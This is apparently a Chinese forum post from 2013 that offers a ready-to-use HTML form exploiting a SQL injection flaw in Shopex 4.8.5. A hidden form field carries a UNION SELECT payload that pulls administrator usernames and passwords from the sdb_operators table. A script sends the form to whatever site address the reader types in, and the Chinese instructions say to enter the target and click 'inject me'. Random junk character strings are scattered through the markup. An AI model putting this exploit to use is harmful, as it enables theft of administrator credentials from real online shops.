<center>( R4 M6 d) z1 M& ^
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
3 Q/ C1 W( ]$ |' d& U% e<form action="" method="post" name="submit_url">* @+ ~! S( g' ]$ H: _6 r
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
7 d7 ^. F* D% M<input type="hidden" name="goods[goods_id]" value="3">, F1 h9 h8 g: [
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
8 o- T$ |8 ?3 Y<input type="submit" value="给我注入" onclick=fsubmit()>
# Q v$ d0 A: v* s9 E+ ]</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com) X: r0 O9 {& W! Y$ _
% J+ E! F) p' h6 G% A& Y
<script>
. @; j, @6 o; \3 x' m! R; N F. ~function fsubmit(){
- P7 @0 m" k M0 g+ f8 x/ Dform = document.forms[0];
% ~, \2 t0 T5 o( d1 x+ E+ ^. V7 Oform.action = form.url.value+'/?product-gnotify'; # O6 |3 L/ ~3 t+ ]
form.submit(); ! Z3 w& q* o% x5 k7 T7 }4 c
}
; R" i) S* X ~- c% ?</script>
7 n; P8 i% E( u7 z7 s7 U' I$ h9 } |
发表于 2013-1-23 09:20:52
收藏
支持
反对